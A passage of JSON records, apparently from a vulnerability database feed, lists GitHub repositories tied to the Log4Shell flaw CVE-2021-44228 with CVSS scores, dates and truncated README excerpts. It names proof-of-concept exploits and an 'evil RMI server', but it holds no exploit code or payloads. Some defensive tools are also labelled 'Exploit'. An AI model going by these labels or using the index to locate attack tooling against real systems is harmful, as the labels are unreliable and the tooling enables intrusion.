"userInteraction": "NONE"}}, "published": "2021-12-16T11:54:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-22T23:48:42", "id": "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:22", "description": "# Evaluate the Log4Shell: RCE 0-day Issue\n\nThis repo contains t...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-14T02:26:56", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T03:53:41", "id": "F32DF396-0485-5F43-8A52-31B8DD252790", "href": "", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:10", "description": "# CVE-2021-44228 \n\n\n> \u3053\u3063\u3061\u306e\u304a\u8a71\u306e\u65b9\u304c\u3088\u308a\u5b9f\u7528\u6027\u304c\u3042\u308b\u3068\u601d\u3044\u307e\u3059(\u6ce3)[christophetd/lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T23:37:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T01:11:19", "id": "11719BED-E629-5C79-944E-7E40BBFC460C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:25:24", "description": "# Vulnerable application\n\nThis repository contains a Spring Boot...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-31T20:39:44", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T10:57:33", "id": "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-12T05:28:20", "description": "# Log4Shell\n\nThis repository is for Log4j 2021 (CVE-2021-44228) ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-12T03:02:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, 
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-12T03:02:24", "id": "E4491698-477C-599A-A65D-EBA7441764E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:28:58", "description": "# Get-log4j-Windows-local.ps1\n \n Identify all log4j components ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-19T07:35:01", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-28T18:51:03", "id": "7865A97A-CD10-5E45-9429-CF5F72A6952B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T01:33:11", "description": "# Log4NoShell\nA Java Agent that disables Apache Log4J's JNDI Loo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:33:57", "id": "1097EF60-FC77-5135-B92B-4A84B46FABAF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:35:57", "description": "# Log4NoShell\nA Java Agent that disables Apache Log4J's JNDI Loo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:33:57", "id": "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:28:33", "description": "# cve-2021-44228-log4j-test\n\n\ud14c\uc2a4\ud2b8\n \n## **1. LDAP \uc11c\ubc84\uc640 \ud574\ud0b9 \ud30c\uc77c \ub2e4\uc6b4\ub85c\ub4dc ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-20T11:07:21", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T04:27:08", "id": "8021D807-3EDC-55A7-A9ED-A364159FADEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-29T07:58:53", "description": "# CVE-2021-44228 (Apache Log4j Remote 
Code Execution\uff09\n\n> [all lo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T08:46:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-29T06:51:14", "id": "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:49", "description": "# evil-rmi-server\nAn evil RMI server that can launch an arbitrar...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T16:49:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:02", "id": "22AAF71B-053F-5E71-9F26-039C48FCCD62", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:27:16", "description": "# CVE-2021-44228-log4jVulnScanner-metasploit\nopen detection and ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-23T01:59:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:22", "id": "BA8F1657-CF64-574C-81BA-6432D5A351D4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, 
"privateArea": 1}, {"lastseen": "2023-11-28T02:33:30", "description": "# log4j-nullroute\nQuick script to ingest IP feed from greynoise....", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T03:15:42", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:03", "id": "BE66A9B6-104B-5F49-918A-8B913CE46473", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:22", "description": "# Python Log4RCE\n\nAn all-in-one pure Python3 PoC for [CVE-2021-4...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T02:57:49", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache 
Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-24T20:20:53", "id": "B22E3A22-BF14-5660-977A-2D28D2AA2500", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:09", "description": "# `log4j-remediation-tools`\n\n> Tools for finding and reproducing...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-14T21:47:04", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-08-09T21:35:25", "id": 
"CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:26:41", "description": "# Log4j Simple Exploit\r\nA Proof-Of-Concept Exploit for ***CVE-20...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-24T09:26:38", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-26T12:00:37", "id": "D536CD4F-33F2-570F-BA34-54E141F1132C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:14", "description": "# Log4J lab\n\n### Description\nThis is a lab ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": 
"2021-12-13T08:13:07", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:04", "id": "2EACBFB9-2956-564B-A859-6C85EF9F785A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:58", "description": "# CVE-2021-44228-Log4Shell-Hashes\nHashes for vulnerable LOG4J ve...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T18:06:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": fa